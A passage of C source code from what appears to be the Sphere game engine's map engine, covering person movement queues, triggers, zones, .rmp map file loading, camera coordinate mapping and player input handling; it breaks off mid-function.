person->follow_distance = distance;
}
void
person_set_visible(person_t* person, bool visible)
{
person->is_visible = visible;
}
void
person_set_xyz(person_t* person, double x, double y, int layer)
{
person->x = x;
person->y = y;
person->layer = layer;
sort_persons();
}
void
person_on_event(person_t* person, int type, script_t* script)
{
script_unref(person->scripts[type]);
person->scripts[type] = script;
}
void
person_activate(const person_t* person, person_op_t op, const person_t* acting_person, bool use_default)
{
const person_t* last_acting;
const person_t* last_current;
last_acting = s_acting_person;
last_current = s_current_person;
s_acting_person = acting_person;
s_current_person = person;
if (use_default)
script_run(s_def_person_scripts[op], false);
if (does_person_exist(person))
script_run(person->scripts[op], false);
s_acting_person = last_acting;
s_current_person = last_current;
}
void
person_call_default(const person_t* person, person_op_t op, const person_t* acting_person)
{
const person_t* last_acting;
const person_t* last_current;
last_acting = s_acting_person;
last_current = s_current_person;
s_acting_person = acting_person;
s_current_person = person;
script_run(s_def_person_scripts[op], false);
s_acting_person = last_acting;
s_current_person = last_current;
}
void
person_clear_ignores(person_t* person)
{
int i;
for (i = 0; i < person->num_ignores; ++i)
free(person->ignores[i]);
person->num_ignores = 0;
}
void
person_clear_queue(person_t* person)
{
person->num_commands = 0;
}
bool
person_compile_script(person_t* person, int type, const lstring_t* codestring)
{
script_t* script;
const char* script_name;
script_name = type == PERSON_SCRIPT_ON_CREATE ? "onCreate"
: type == PERSON_SCRIPT_ON_DESTROY ? "onDestroy"
: type == PERSON_SCRIPT_ON_TOUCH ? "onTouch"
: type == PERSON_SCRIPT_ON_TALK ? "onTalk"
: type == PERSON_SCRIPT_GENERATOR ? "genCommands"
: NULL;
if (script_name == NULL)
return false;
script = script_new(codestring, "%s/%s/%s.js", map_pathname(), person->name, script_name);
person_on_event(person, type, script);
return true;
}
void
person_ignore_name(person_t* person, const char* name)
{
int index;
index = person->num_ignores++;
person->ignores = realloc(person->ignores, person->num_ignores * sizeof(char*));
person->ignores[index] = strdup(name);
// ignore list changed, delete cache
vector_free(person->ignore_list);
person->ignore_list = NULL;
}
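// person_queue_command: appends a movement or pose command to the person's queue.
// diagonal movement commands are decomposed into two cardinal moves; the first half is
// always queued as immediate so both components are executed in the same frame.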
bool
person_queue_command(person_t* person, int command, bool is_immediate)
{
struct command* commands;
bool is_aok = true;
switch (command) {
case COMMAND_MOVE_NORTHEAST:
is_aok &= person_queue_command(person, COMMAND_MOVE_NORTH, true);
is_aok &= person_queue_command(person, COMMAND_MOVE_EAST, is_immediate);
return is_aok;
case COMMAND_MOVE_SOUTHEAST:
is_aok &= person_queue_command(person, COMMAND_MOVE_SOUTH, true);
is_aok &= person_queue_command(person, COMMAND_MOVE_EAST, is_immediate);
return is_aok;
case COMMAND_MOVE_SOUTHWEST:
is_aok &= person_queue_command(person, COMMAND_MOVE_SOUTH, true);
is_aok &= person_queue_command(person, COMMAND_MOVE_WEST, is_immediate);
return is_aok;
case COMMAND_MOVE_NORTHWEST:
is_aok &= person_queue_command(person, COMMAND_MOVE_NORTH, true);
is_aok &= person_queue_command(person, COMMAND_MOVE_WEST, is_immediate);
return is_aok;
default:
++person->num_commands;
if (person->num_commands > person->max_commands) {
if (!(commands = realloc(person->commands, person->num_commands * 2 * sizeof(struct command))))
return false;
person->max_commands = person->num_commands * 2;
person->commands = commands;
}
person->commands[person->num_commands - 1].type = command;
person->commands[person->num_commands - 1].is_immediate = is_immediate;
person->commands[person->num_commands - 1].script = NULL;
return true;
}
}
bool
person_queue_script(person_t* person, script_t* script, bool is_immediate)
{
++person->num_commands;
if (person->num_commands > person->max_commands) {
person->max_commands = person->num_commands * 2;
if (!(person->commands = realloc(person->commands, person->max_commands * sizeof(struct command))))
return false;
}
person->commands[person->num_commands - 1].type = COMMAND_RUN_SCRIPT;
person->commands[person->num_commands - 1].is_immediate = is_immediate;
person->commands[person->num_commands - 1].script = script;
return true;
}
void
person_talk(const person_t* person)
{
rect_t map_rect;
person_t* target_person;
double talk_x, talk_y;
map_rect = map_bounds();
// check if anyone else is within earshot
person_get_xy(person, &talk_x, &talk_y, true);
if (strstr(person->direction, "north"))
talk_y -= s_talk_distance;
if (strstr(person->direction, "east"))
talk_x += s_talk_distance;
if (strstr(person->direction, "south"))
talk_y += s_talk_distance;
if (strstr(person->direction, "west"))
talk_x -= s_talk_distance;
person_obstructed_at(person, talk_x, talk_y, &target_person, NULL);
// if so, call their talk script
if (target_person != NULL)
person_activate(target_person, PERSON_SCRIPT_ON_TALK, person, true);
}
void
trigger_get_xyz(int trigger_index, int* out_x, int* out_y, int* out_layer)
{
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
if (out_x != NULL)
*out_x = trigger->x;
if (out_y != NULL)
*out_y = trigger->y;
if (out_layer) *out_layer = trigger->z;
}
void
trigger_set_layer(int trigger_index, int layer)
{
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
trigger->z = layer;
}
void
trigger_set_script(int trigger_index, script_t* script)
{
script_t* old_script;
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
old_script = trigger->script;
trigger->script = script_ref(script);
script_unref(old_script);
}
void
trigger_set_xy(int trigger_index, int x, int y)
{
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
trigger->x = x;
trigger->y = y;
}
void
trigger_activate(int trigger_index)
{
int last_trigger;
struct map_trigger* trigger;
trigger = vector_get(s_map->triggers, trigger_index);
last_trigger = s_current_trigger;
s_current_trigger = trigger_index;
script_run(trigger->script, true);
s_current_trigger = last_trigger;
}
rect_t
zone_get_bounds(int zone_index)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
return zone->bounds;
}
int
zone_get_layer(int zone_index)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
return zone->layer;
}
int
zone_get_steps(int zone_index)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
return zone->interval;
}
void
zone_set_bounds(int zone_index, rect_t bounds)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
rect_normalize(&bounds);
zone->bounds = bounds;
}
void
zone_set_layer(int zone_index, int layer)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
zone->layer = layer;
}
void
zone_set_script(int zone_index, script_t* script)
{
script_t* old_script;
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
old_script = zone->script;
zone->script = script_ref(script);
script_unref(old_script);
}
void
zone_set_steps(int zone_index, int interval)
{
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
zone->interval = interval;
zone->steps_left = 0;
}
void
zone_activate(int zone_index)
{
int last_zone;
struct map_zone* zone;
zone = vector_get(s_map->zones, zone_index);
last_zone = s_current_zone;
s_current_zone = zone_index;
script_run(zone->script, true);
s_current_zone = last_zone;
}
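// change_map: loads the new map file, runs the outgoing map's exit script, tears the
// old map down, repopulates persons from the map file, recenters the camera on the
// map origin, and switches background music only if the BGM file differs from the
// last one played.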
static bool
change_map(const char* filename, bool preserve_persons)
{
// note: if an error is detected during a map change, change_map() will return false, but
// the map engine may be left in an inconsistent state. it is therefore probably wise
// to consider such a situation unrecoverable.
struct map* map;
person_t* person;
struct map_person* person_info;
path_t* path;
spriteset_t* spriteset = NULL;
int i;
console_log(2, "changing current map to '%s'", filename);
map = load_map(filename);
if (map == NULL) return false;
if (s_map != NULL) {
// run map exit scripts first, before loading new map
map_activate(MAP_SCRIPT_ON_LEAVE, true);
}
// close out old map and prep for new one
free_map(s_map); free(s_map_filename);
for (i = 0; i < s_num_deferreds; ++i)
script_unref(s_deferreds[i].script);
s_num_deferreds = 0;
s_map = map; s_map_filename = strdup(filename);
reset_persons(preserve_persons);
// populate persons
for (i = 0; i < s_map->num_persons; ++i) {
person_info = &s_map->persons[i];
path = game_full_path(g_game, lstr_cstr(person_info->spriteset), "spritesets", true);
spriteset = spriteset_load(path_cstr(path));
path_free(path);
if (spriteset == NULL)
goto on_error;
if (!(person = person_new(lstr_cstr(person_info->name), spriteset, false, NULL)))
goto on_error;
spriteset_unref(spriteset);
person_set_xyz(person, person_info->x, person_info->y, person_info->z);
person_compile_script(person, PERSON_SCRIPT_ON_CREATE, person_info->create_script);
person_compile_script(person, PERSON_SCRIPT_ON_DESTROY, person_info->destroy_script);
person_compile_script(person, PERSON_SCRIPT_ON_TOUCH, person_info->touch_script);
person_compile_script(person, PERSON_SCRIPT_ON_TALK, person_info->talk_script);
person_compile_script(person, PERSON_SCRIPT_GENERATOR, person_info->command_script);
// normally this is handled by person_new(), but since in this case the
// person-specific create script isn't compiled until after the person is created,
// the map engine gets the responsibility.
person_activate(person, PERSON_SCRIPT_ON_CREATE, NULL, false);
}
// set camera over starting position
s_camera_x = s_map->origin.x;
s_camera_y = s_map->origin.y;
// start up map BGM (if same as previous, leave alone)
if (s_map->bgm_file == NULL && s_map_bgm_stream != NULL) {
sound_unref(s_map_bgm_stream);
lstr_free(s_last_bgm_file);
s_map_bgm_stream = NULL;
s_last_bgm_file = NULL;
}
else if (s_map->bgm_file != NULL
&& (s_last_bgm_file == NULL || lstr_cmp(s_map->bgm_file, s_last_bgm_file) != 0))
{
sound_unref(s_map_bgm_stream);
lstr_free(s_last_bgm_file);
s_last_bgm_file = lstr_dup(s_map->bgm_file);
path = game_full_path(g_game, lstr_cstr(s_map->bgm_file), "sounds", true);
if ((s_map_bgm_stream = sound_new(path_cstr(path)))) {
sound_set_repeat(s_map_bgm_stream, true);
sound_play(s_map_bgm_stream, s_bgm_mixer);
}
path_free(path);
}
// run map entry scripts
map_activate(MAP_SCRIPT_ON_ENTER, true);
s_frames = 0;
return true;
on_error:
spriteset_unref(spriteset);
free_map(s_map);
return false;
}
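// command_person: executes a single queued command on a person: a pose change, one
// step of sprite animation, or a move along an axis by the person's speed. moves are
// obstruction-checked; colliding with another person fires that person's touch script.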
static void
command_person(person_t* person, int command)
{
double new_x;
double new_y;
person_t* person_to_touch;
new_x = person->x;
new_y = person->y;
switch (command) {
case COMMAND_ANIMATE:
person->revert_frames = person->revert_delay;
if (person->anim_frames > 0 && --person->anim_frames == 0) {
++person->frame;
person->anim_frames = spriteset_frame_delay(person->sprite, person->direction, person->frame);
}
break;
case COMMAND_FACE_NORTH:
person_set_pose(person, "north");
break;
case COMMAND_FACE_NORTHEAST:
person_set_pose(person, "northeast");
break;
case COMMAND_FACE_EAST:
person_set_pose(person, "east");
break;
case COMMAND_FACE_SOUTHEAST:
person_set_pose(person, "southeast");
break;
case COMMAND_FACE_SOUTH:
person_set_pose(person, "south");
break;
case COMMAND_FACE_SOUTHWEST:
person_set_pose(person, "southwest");
break;
case COMMAND_FACE_WEST:
person_set_pose(person, "west");
break;
case COMMAND_FACE_NORTHWEST:
person_set_pose(person, "northwest");
break;
case COMMAND_MOVE_NORTH:
new_y = person->y - person->speed_y;
break;
case COMMAND_MOVE_EAST:
new_x = person->x + person->speed_x;
break;
case COMMAND_MOVE_SOUTH:
new_y = person->y + person->speed_y;
break;
case COMMAND_MOVE_WEST:
new_x = person->x - person->speed_x;
break;
}
if (new_x != person->x || new_y != person->y) {
// person is trying to move, make sure the path is clear of obstructions
if (!person_obstructed_at(person, new_x, new_y, &person_to_touch, NULL)) {
if (new_x != person->x)
person->mv_x = new_x > person->x ? 1 : -1;
if (new_y != person->y)
person->mv_y = new_y > person->y ? 1 : -1;
person->x = new_x;
person->y = new_y;
}
else {
// if not, and we collided with a person, call that person's touch script
if (person_to_touch != NULL)
person_activate(person_to_touch, PERSON_SCRIPT_ON_TOUCH, person, true);
}
}
}
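// compare_persons: qsort() comparator used by sort_persons(). persons are drawn in
// ascending Y order; a follower sorts ahead of its leader when Y values tie, and the
// person ID breaks any remaining ties so the ordering stays stable across frames.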
static int
compare_persons(const void* a, const void* b)
{
person_t* p1 = *(person_t**)a;
person_t* p2 = *(person_t**)b;
double x, y_p1, y_p2;
int y_delta;
person_get_xy(p1, &x, &y_p1, true);
person_get_xy(p2, &x, &y_p2, true);
y_delta = y_p1 - y_p2;
if (y_delta != 0)
return y_delta;
else if (person_following(p1, p2))
return -1;
else if (person_following(p2, p1))
return 1;
else
return p1->id - p2->id;
}
static void
detach_person(const person_t* person)
{
int i;
if (s_camera_person == person)
s_camera_person = NULL;
for (i = 0; i < PLAYER_MAX; ++i) {
if (s_players[i].person == person)
s_players[i].person = NULL;
}
}
static bool
does_person_exist(const person_t* person)
{
int i;
for (i = 0; i < s_num_persons; ++i)
if (person == s_persons[i]) return true;
return false;
}
static void
draw_persons(int layer, bool is_flipped, int cam_x, int cam_y)
{
person_t* person;
spriteset_t* sprite;
int w, h;
double x, y;
int i;
for (i = 0; i < s_num_persons; ++i) {
person = s_persons[i];
if (!person->is_visible || person->layer != layer)
continue;
sprite = person->sprite;
w = spriteset_width(sprite);
h = spriteset_height(sprite);
person_get_xy(person, &x, &y, true);
x -= cam_x - person->x_offset;
y -= cam_y - person->y_offset;
spriteset_draw(sprite, person->mask, is_flipped, person->theta, person->scale_x, person->scale_y,
person->direction, trunc(x), trunc(y), person->frame);
}
}
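// enlarge_step_history: grows a person's step history buffer to at least `new_size`
// entries. newly added slots are seeded with the pastmost recorded position (or the
// person's current position if there is no history yet) so followers don't read
// uninitialized data.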
static bool
enlarge_step_history(person_t* person, int new_size)
{
struct step *new_steps;
size_t pastmost;
double last_x;
double last_y;
int i;
if (new_size > person->max_history) {
if (!(new_steps = realloc(person->steps, new_size * sizeof(struct step))))
return false;
// when enlarging the history buffer, fill new slots with pastmost values
// (kind of like sign extension)
pastmost = person->max_history - 1;
last_x = person->steps != NULL ? person->steps[pastmost].x : person->x;
last_y = person->steps != NULL ? person->steps[pastmost].y : person->y;
for (i = person->max_history; i < new_size; ++i) {
new_steps[i].x = last_x;
new_steps[i].y = last_y;
}
person->steps = new_steps;
person->max_history = new_size;
}
return true;
}
static void
free_map(struct map* map)
{
struct map_trigger* trigger;
struct map_zone* zone;
iter_t iter;
int i;
if (map == NULL)
return;
for (i = 0; i < MAP_SCRIPT_MAX; ++i)
script_unref(map->scripts[i]);
for (i = 0; i < map->num_layers; ++i) {
script_unref(map->layers[i].render_script);
lstr_free(map->layers[i].name);
free(map->layers[i].tilemap);
obsmap_free(map->layers[i].obsmap);
}
for (i = 0; i < map->num_persons; ++i) {
lstr_free(map->persons[i].name);
lstr_free(map->persons[i].spriteset);
lstr_free(map->persons[i].create_script);
lstr_free(map->persons[i].destroy_script);
lstr_free(map->persons[i].command_script);
lstr_free(map->persons[i].talk_script);
lstr_free(map->persons[i].touch_script);
}
	iter = vector_enum(map->triggers);
	while ((trigger = iter_next(&iter)))
		script_unref(trigger->script);
	iter = vector_enum(map->zones);
	while ((zone = iter_next(&iter)))
		script_unref(zone->script);
	lstr_free(map->bgm_file);
tileset_free(map->tileset);
free(map->layers);
free(map->persons);
vector_free(map->triggers);
vector_free(map->zones);
free(map);
}
static void
free_person(person_t* person)
{
int i;
free(person->steps);
for (i = 0; i < PERSON_SCRIPT_MAX; ++i)
script_unref(person->scripts[i]);
spriteset_unref(person->sprite);
free(person->commands);
free(person->name);
free(person->direction);
free(person);
}
static struct map_trigger*
get_trigger_at(int x, int y, int layer, int* out_index)
{
rect_t bounds;
struct map_trigger* found_item = NULL;
int tile_w, tile_h;
struct map_trigger* trigger;
iter_t iter;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
iter = vector_enum(s_map->triggers);
while ((trigger = iter_next(&iter))) {
if (trigger->z != layer && false) // layer ignored for compatibility reasons
continue;
bounds.x1 = trigger->x - tile_w / 2;
bounds.y1 = trigger->y - tile_h / 2;
bounds.x2 = bounds.x1 + tile_w;
bounds.y2 = bounds.y1 + tile_h;
if (is_point_in_rect(x, y, bounds)) {
found_item = trigger;
if (out_index != NULL)
*out_index = (int)iter.index;
break;
}
}
return found_item;
}
static struct map_zone*
get_zone_at(int x, int y, int layer, int which, int* out_index)
{
struct map_zone* found_item = NULL;
struct map_zone* zone;
iter_t iter;
int i;
iter = vector_enum(s_map->zones); i = -1;
while ((zone = iter_next(&iter))) {
if (zone->layer != layer && false) // layer ignored for compatibility
continue;
if (is_point_in_rect(x, y, zone->bounds) && which-- == 0) {
found_item = zone;
if (out_index) *out_index = (int)iter.index;
break;
}
}
return found_item;
}
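// load_map: reads a Sphere .rmp map file (format version 1) and builds the in-memory
// map: header strings, layers with tilemaps and obstruction maps, person and trigger
// entities, zones, and the tileset (external file or embedded in the map).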
static struct map*
load_map(const char* filename)
{
// strings: 0 - tileset filename
// 1 - music filename
// 2 - script filename (obsolete, not used)
// 3 - entry script
// 4 - exit script
// 5 - exit north script
// 6 - exit east script
// 7 - exit south script
// 8 - exit west script
uint16_t count;
struct rmp_entity_header entity_hdr;
file_t* file = NULL;
bool has_failed;
struct map_layer* layer;
struct rmp_layer_header layer_hdr;
struct map* map = NULL;
int num_tiles;
struct map_person* person;
struct rmp_header rmp;
lstring_t* script;
rect_t segment;
int16_t* tile_data = NULL;
path_t* tileset_path;
tileset_t* tileset;
struct map_trigger trigger;
struct map_zone zone;
struct rmp_zone_header zone_hdr;
lstring_t* *strings = NULL;
int i, j, x, y, z;
console_log(2, "constructing new map from '%s'", filename);
memset(&rmp, 0, sizeof(struct rmp_header));
if (!(file = file_open(g_game, filename, "rb")))
goto on_error;
map = calloc(1, sizeof(struct map));
if (file_read(file, &rmp, 1, sizeof(struct rmp_header)) != 1)
goto on_error;
if (memcmp(rmp.signature, ".rmp", 4) != 0) goto on_error;
if (rmp.num_strings != 3 && rmp.num_strings != 5 && rmp.num_strings < 9)
goto on_error;
if (rmp.start_layer < 0 || rmp.start_layer >= rmp.num_layers)
rmp.start_layer = 0; // being nice here, this really should fail outright
switch (rmp.version) {
case 1:
// load strings (resource filenames, scripts, etc.)
strings = calloc(rmp.num_strings, sizeof(lstring_t*));
has_failed = false;
for (i = 0; i < rmp.num_strings; ++i)
has_failed = has_failed || ((strings[i] = read_lstring(file, true)) == NULL);
if (has_failed) goto on_error;
// pre-allocate map structures
map->layers = calloc(rmp.num_layers, sizeof(struct map_layer));
map->persons = calloc(rmp.num_entities, sizeof(struct map_person));
map->triggers = vector_new(sizeof(struct map_trigger));
map->zones = vector_new(sizeof(struct map_zone));
// load layers
for (i = 0; i < rmp.num_layers; ++i) {
if (file_read(file, &layer_hdr, 1, sizeof(struct rmp_layer_header)) != 1)
goto on_error;
layer = &map->layers[i];
layer->is_parallax = (layer_hdr.flags & 2) != 0x0;
layer->is_reflective = layer_hdr.is_reflective;
layer->is_visible = (layer_hdr.flags & 1) == 0x0;
layer->color_mask = mk_color(255, 255, 255, 255);
layer->width = layer_hdr.width;
layer->height = layer_hdr.height;
layer->autoscroll_x = layer->is_parallax ? layer_hdr.scrolling_x : 0.0;
layer->autoscroll_y = layer->is_parallax ? layer_hdr.scrolling_y : 0.0;
layer->parallax_x = layer->is_parallax ? layer_hdr.parallax_x : 1.0;
layer->parallax_y = layer->is_parallax ? layer_hdr.parallax_y : 1.0;
if (!layer->is_parallax) {
map->width = fmax(map->width, layer->width);
map->height = fmax(map->height, layer->height);
}
if (!(layer->tilemap = malloc(layer_hdr.width * layer_hdr.height * sizeof(struct map_tile))))
goto on_error;
layer->name = read_lstring(file, true);
layer->obsmap = obsmap_new();
num_tiles = layer_hdr.width * layer_hdr.height;
if ((tile_data = malloc(num_tiles * 2)) == NULL)
goto on_error;
if (file_read(file, tile_data, num_tiles, 2) != num_tiles)
goto on_error;
for (j = 0; j < num_tiles; ++j)
layer->tilemap[j].tile_index = tile_data[j];
for (j = 0; j < layer_hdr.num_segments; ++j) {
if (!fread_rect32(file, &segment)) goto on_error;
obsmap_add_line(layer->obsmap, segment);
}
free(tile_data);
tile_data = NULL;
}
// if either dimension is zero, the map has no non-parallax layers and is thus malformed
if (map->width == 0 || map->height == 0)
goto on_error;
// load entities
map->num_persons = 0;
for (i = 0; i < rmp.num_entities; ++i) {
if (file_read(file, &entity_hdr, 1, sizeof(struct rmp_entity_header)) != 1)
goto on_error;
if (entity_hdr.z < 0 || entity_hdr.z >= rmp.num_layers)
entity_hdr.z = 0;
switch (entity_hdr.type) {
case 1: // person
++map->num_persons;
person = &map->persons[map->num_persons - 1];
memset(person, 0, sizeof(struct map_person));
if (!(person->name = read_lstring(file, true)))
goto on_error;
if (!(person->spriteset = read_lstring(file, true)))
goto on_error;
person->x = entity_hdr.x; person->y = entity_hdr.y; person->z = entity_hdr.z;
if (file_read(file, &count, 1, 2) != 1 || count < 5)
goto on_error;
person->create_script = read_lstring(file, false);
person->destroy_script = read_lstring(file, false);
person->touch_script = read_lstring(file, false);
person->talk_script = read_lstring(file, false);
person->command_script = read_lstring(file, false);
for (j = 5; j < count; ++j)
lstr_free(read_lstring(file, true));
file_seek(file, 16, WHENCE_CUR);
break;
case 2: // trigger
if ((script = read_lstring(file, false)) == NULL) goto on_error;
memset(&trigger, 0, sizeof(struct map_trigger));
trigger.x = entity_hdr.x;
trigger.y = entity_hdr.y;
trigger.z = entity_hdr.z;
trigger.script = script_new(script, "%s/trig%d", filename, vector_len(map->triggers));
if (!vector_push(map->triggers, &trigger))
					goto on_error;
lstr_free(script);
break;
default:
goto on_error;
}
}
// load zones
for (i = 0; i < rmp.num_zones; ++i) {
if (file_read(file, &zone_hdr, 1, sizeof(struct rmp_zone_header)) != 1)
goto on_error;
if ((script = read_lstring(file, false)) == NULL) goto on_error;
if (zone_hdr.layer < 0 || zone_hdr.layer >= rmp.num_layers)
zone_hdr.layer = 0;
zone.layer = zone_hdr.layer;
zone.bounds = mk_rect(zone_hdr.x1, zone_hdr.y1, zone_hdr.x2, zone_hdr.y2);
zone.interval = zone_hdr.interval;
zone.steps_left = 0;
zone.script = script_new(script, "%s/zone%d", filename, vector_len(map->zones));
rect_normalize(&zone.bounds);
if (!vector_push(map->zones, &zone))
				goto on_error;
lstr_free(script);
}
// load tileset
if (strcmp(lstr_cstr(strings[0]), "") != 0) {
tileset_path = path_strip(path_new(filename));
path_append(tileset_path, lstr_cstr(strings[0]));
tileset = tileset_new(path_cstr(tileset_path));
path_free(tileset_path);
}
else {
tileset = tileset_read(file);
}
if (tileset == NULL) goto on_error;
// initialize tile animation
for (z = 0; z < rmp.num_layers; ++z) {
layer = &map->layers[z];
for (x = 0; x < layer->width; ++x) for (y = 0; y < layer->height; ++y) {
i = x + y * layer->width;
map->layers[z].tilemap[i].frames_left =
tileset_get_delay(tileset, map->layers[z].tilemap[i].tile_index);
}
}
// wrap things up
map->bgm_file = strcmp(lstr_cstr(strings[1]), "") != 0
? lstr_dup(strings[1]) : NULL;
map->num_layers = rmp.num_layers;
map->is_repeating = rmp.repeat_map;
map->origin.x = rmp.start_x;
map->origin.y = rmp.start_y;
map->origin.z = rmp.start_layer;
map->tileset = tileset;
if (rmp.num_strings >= 5) {
map->scripts[MAP_SCRIPT_ON_ENTER] = script_new(strings[3], "%s/onEnter", filename);
map->scripts[MAP_SCRIPT_ON_LEAVE] = script_new(strings[4], "%s/onLeave", filename);
}
if (rmp.num_strings >= 9) {
			map->scripts[MAP_SCRIPT_ON_LEAVE_NORTH] = script_new(strings[5], "%s/onLeaveNorth", filename);
map->scripts[MAP_SCRIPT_ON_LEAVE_EAST] = script_new(strings[6], "%s/onLeaveEast", filename);
map->scripts[MAP_SCRIPT_ON_LEAVE_SOUTH] = script_new(strings[7], "%s/onLeaveSouth", filename);
map->scripts[MAP_SCRIPT_ON_LEAVE_WEST] = script_new(strings[8], "%s/onLeaveWest", filename);
}
for (i = 0; i < rmp.num_strings; ++i)
lstr_free(strings[i]);
free(strings);
break;
default:
goto on_error;
}
file_close(file);
return map;
on_error:
if (file != NULL) file_close(file);
free(tile_data);
if (strings != NULL) {
for (i = 0; i < rmp.num_strings; ++i) lstr_free(strings[i]);
free(strings);
}
if (map != NULL) {
if (map->layers != NULL) {
for (i = 0; i < rmp.num_layers; ++i) {
lstr_free(map->layers[i].name);
free(map->layers[i].tilemap);
obsmap_free(map->layers[i].obsmap);
}
free(map->layers);
}
if (map->persons != NULL) {
for (i = 0; i < map->num_persons; ++i) {
lstr_free(map->persons[i].name);
lstr_free(map->persons[i].spriteset);
lstr_free(map->persons[i].create_script);
lstr_free(map->persons[i].destroy_script);
lstr_free(map->persons[i].command_script);
lstr_free(map->persons[i].talk_script);
lstr_free(map->persons[i].touch_script);
}
free(map->persons);
}
vector_free(map->triggers);
vector_free(map->zones);
free(map);
}
return NULL;
}
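// map_screen_to_layer: converts screen coordinates into coordinates on a specific
// layer, clamping the camera for non-repeating maps, applying per-layer autoscroll
// and parallax offsets, and wrapping the result for repeating or parallax layers.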
static void
map_screen_to_layer(int layer, int camera_x, int camera_y, int* inout_x, int* inout_y)
{
rect_t bounds;
int center_x;
int center_y;
int layer_h;
int layer_w;
float plx_offset_x = 0.0;
	float plx_offset_y = 0.0;
size2_t resolution;
int tile_w;
int tile_h;
int x_offset;
int y_offset;
// get layer and screen metrics
resolution = screen_size(g_screen);
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
layer_w = s_map->layers[layer].width * tile_w;
layer_h = s_map->layers[layer].height * tile_h;
center_x = resolution.width / 2;
center_y = resolution.height / 2;
// initial camera correction
if (!s_map->is_repeating) {
bounds = map_bounds();
camera_x = fmin(fmax(camera_x, bounds.x1 + center_x), bounds.x2 - center_x);
camera_y = fmin(fmax(camera_y, bounds.y1 + center_y), bounds.y2 - center_y);
}
// remap screen coordinates to layer coordinates
plx_offset_x = s_frames * s_map->layers[layer].autoscroll_x
- camera_x * (s_map->layers[layer].parallax_x - 1.0);
plx_offset_y = s_frames * s_map->layers[layer].autoscroll_y
- camera_y * (s_map->layers[layer].parallax_y - 1.0);
x_offset = camera_x - center_x - plx_offset_x;
y_offset = camera_y - center_y - plx_offset_y;
if (!s_map->is_repeating && !s_map->layers[layer].is_parallax) {
// if the map is smaller than the screen, align to top left. centering
// would be better aesthetically, but there are a couple Sphere 1.x games
// that depend on top-left justification.
if (layer_w < resolution.width)
x_offset = 0;
if (layer_h < resolution.height)
y_offset = 0;
}
if (inout_x != NULL)
*inout_x += x_offset;
if (inout_y != NULL)
*inout_y += y_offset;
// normalize coordinates. this simplifies rendering calculations.
if (s_map->is_repeating || s_map->layers[layer].is_parallax) {
if (inout_x) *inout_x = (*inout_x % layer_w + layer_w) % layer_w;
if (inout_y) *inout_y = (*inout_y % layer_h + layer_h) % layer_h;
}
}
static void
map_screen_to_map(int camera_x, int camera_y, int* inout_x, int* inout_y)
{
rect_t bounds;
int center_x;
int center_y;
int map_h;
int map_w;
size2_t resolution;
int tile_h;
int tile_w;
int x_offset;
int y_offset;
// get layer and screen metrics
resolution = screen_size(g_screen);
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
map_w = s_map->width * tile_w;
map_h = s_map->height * tile_h;
center_x = resolution.width / 2;
center_y = resolution.height / 2;
// initial camera correction
if (!s_map->is_repeating) {
bounds = map_bounds();
camera_x = fmin(fmax(camera_x, bounds.x1 + center_x), bounds.x2 - center_x);
camera_y = fmin(fmax(camera_y, bounds.y1 + center_y), bounds.y2 - center_y);
}
// remap screen coordinates to map coordinates
x_offset = camera_x - center_x;
y_offset = camera_y - center_y;
if (!s_map->is_repeating) {
// if the map is smaller than the screen, align to top left. centering
// would be better aesthetically, but there are a couple Sphere 1.x games
// that depend on top-left justification.
if (map_w < resolution.width)
x_offset = 0;
if (map_h < resolution.height)
y_offset = 0;
}
if (inout_x != NULL)
*inout_x += x_offset;
if (inout_y != NULL)
*inout_y += y_offset;
// normalize coordinates
if (s_map->is_repeating) {
if (inout_x) *inout_x = (*inout_x % map_w + map_w) % map_w;
if (inout_y) *inout_y = (*inout_y % map_h + map_h) % map_h;
}
}
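// process_map_input: polls keyboard and joystick state for each attached player and
// turns it into talk activations and queued movement commands for the bound input
// persons. the `mv_x + mv_y * 3` expression below folds the eight possible directions
// into distinct switch cases.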
static void
process_map_input(void)
{
int mv_x, mv_y;
person_t* person;
int i;
// clear out excess keys from key queue
kb_clear_queue();
// check for player control of input persons, if there are any
for (i = 0; i < PLAYER_MAX; ++i) {
person = s_players[i].person;
if (person != NULL) {
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_A))
|| kb_is_key_down(s_players[i].talk_key)
|| joy_is_button_down(i, s_talk_button))
{
if (s_players[i].is_talk_allowed)
person_talk(person);
s_players[i].is_talk_allowed = false;
}
else {
// allow talking again only after key is released
s_players[i].is_talk_allowed = true;
}
mv_x = 0; mv_y = 0;
if (person->num_commands == 0 && person->leader == NULL) {
// allow player control only if the input person is idle and not being led around
// by someone else.
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_UP)) || joy_position(i, 1) <= -0.5)
mv_y = -1;
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_RIGHT)) || joy_position(i, 0) >= 0.5)
mv_x = 1;
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_DOWN)) || joy_position(i, 1) >= 0.5)
mv_y = 1;
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_LEFT)) || joy_position(i, 0) <= -0.5)
mv_x = -1;
}
switch (mv_x + mv_y * 3) {
case -3: // north
person_queue_command(person, COMMAND_MOVE_NORTH, true);
person_queue_command(person, COMMAND_FACE_NORTH, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case -2: // northeast
person_queue_command(person, COMMAND_MOVE_NORTHEAST, true);
person_queue_command(person, COMMAND_FACE_NORTHEAST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case 1: // east
person_queue_command(person, COMMAND_MOVE_EAST, true);
person_queue_command(person, COMMAND_FACE_EAST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case 4: // southeast
person_queue_command(person, COMMAND_MOVE_SOUTHEAST, true);
person_queue_command(person, COMMAND_FACE_SOUTHEAST, true);
